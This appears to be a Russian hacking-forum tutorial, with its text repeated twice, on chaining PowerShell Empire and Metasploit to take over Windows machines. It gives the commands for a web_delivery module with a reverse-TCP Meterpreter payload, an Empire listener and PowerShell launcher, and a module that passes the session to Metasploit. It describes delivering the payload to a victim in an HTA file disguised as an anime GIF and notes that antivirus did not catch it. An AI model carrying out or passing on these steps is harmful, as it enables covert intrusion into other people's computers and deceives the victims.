Приветик! сегодня покажу как можно хацкнуть windows машину связав 2 инструмента - Empire, и Metasploit.
Я буду юзать машину с заранее установленным Metasploit, проще известный Кали. + Устанавливаем Empire.
Цель: мы будем получать метерпретер сессию используя Empire. Да, да может я поехал, но мне трудно юзать это... Раз в 12 легче юзать более понятный метерпретер. Ну и более скрытно.)
Приступим. Для начала установите Metasploit и Empire если у вас их нет.
EmpireProject/Empire (Empire)
Руководство по установке Metasploit для Linux (Metasploit)
Готово? Теперь открываем 2 окошка с терминалом. В первое пишем.
Во 2-ом окошке пишем, если у вас не kali первую команду пропускайте.
В окне с msf пишем.
Должно выглядеть примерно так.
(Знайте если делаете атаку через сеть интернет
то обязательно пробросте порт 8080, а в параметре SRVHOST ваш локальный ip не в зависимости какая атака.)
Готово, теперь переходим к окну с empire, заранее скажу я хз как настроить там атаку через сеть интернет, я не нашёл нужные команды, как можно изменить свой lhost и lport? Отпишите в коменты.)
Пишем...
Всё у нас есть повершел код и активный слушатель, за вами только доставить этот код на машину, рекомедую это делать с помошью вот этого кодика
Всё жертва увидит танцы аниме тян, а вы agent в empire.
В строке var payload=""; В кавычки вставляем наш повершел код и сохраняем как hta, можно закриптовать весь код, для большей скрытности, но у меня виндовс 7, 8, 10 не чего не засекли и так. А так же можно назвать наш файл gif и потом поменять, местами название и расширение.)
Продолжаем, теперь выбираем нашего агента.
Терь скрываем это окошко идём в Metasploit
пишем exploit -j И получаем подобную ссылку "
Переходим в первое окно, пишем.
Усо как видите мы получили метерпретер сессию, сябки за внимание :з
Вдохновитель -
Да, да слизал всё. Но однако же не нашёл этого в текстовом виде, и на русском языке. Решил как-то расписать, может кому помог.
Я буду юзать машину с заранее установленным Metasploit, проще известный Кали. + Устанавливаем Empire.
Цель: мы будем получать метерпретер сессию используя Empire. Да, да может я поехал, но мне трудно юзать это... Раз в 12 легче юзать более понятный метерпретер. Ну и более скрытно.)
Приступим. Для начала установите Metasploit и Empire если у вас их нет.
EmpireProject/Empire (Empire)
Руководство по установке Metasploit для Linux (Metasploit)
Готово? Теперь открываем 2 окошка с терминалом. В первое пишем.
Код:
cd Empire
./empire
Во 2-ом окошке пишем, если у вас не kali первую команду пропускайте.
Код:
service postgresql start
msfconsole
В окне с msf пишем.
Код:
use exploit/multi/script/web_delivery
set SRVHOST (Ваш локальный ip)
set URIPATH help (В место help можно написать любое слово)
set lhost (Ваш локальный ip или публичный если атака идёт через сеть интернет)
set lport (Любое если идёт в локальной сети, или тот который пробросили)
set target 2 (Это лучше не изменять)
set payload windows/meterpreter/reverse_tcp
exploit -j или же exploit
(Знайте если делаете атаку через сеть интернет
то обязательно пробросте порт 8080, а в параметре SRVHOST ваш локальный ip не в зависимости какая атака.)
Готово, теперь переходим к окну с empire, заранее скажу я хз как настроить там атаку через сеть интернет, я не нашёл нужные команды, как можно изменить свой lhost и lport? Отпишите в коменты.)
Пишем...
Код:
listeners
uselistener http
execute
listener http
launcher powershell http
Ссылка скрыта от гостей
.Всё жертва увидит танцы аниме тян, а вы agent в empire.
В строке var payload=""; В кавычки вставляем наш повершел код и сохраняем как hta, можно закриптовать весь код, для большей скрытности, но у меня виндовс 7, 8, 10 не чего не засекли и так. А так же можно назвать наш файл gif и потом поменять, местами название и расширение.)
Продолжаем, теперь выбираем нашего агента.
Код:
agents
interact (Имя нашего агента)
Терь скрываем это окошко идём в Metasploit
пишем exploit -j И получаем подобную ссылку "
Ссылка скрыта от гостей
" Если атака через интернет сеть то пишите в места локального айпишника свой публичный. Так
Ссылка скрыта от гостей
Переходим в первое окно, пишем.
Код:
usemodule code_execution/invoke_metasploitpayload
set URL (та ссылка которую вы получили)
execute
Усо как видите мы получили метерпретер сессию, сябки за внимание :з
Вдохновитель -
Последнее редактирование: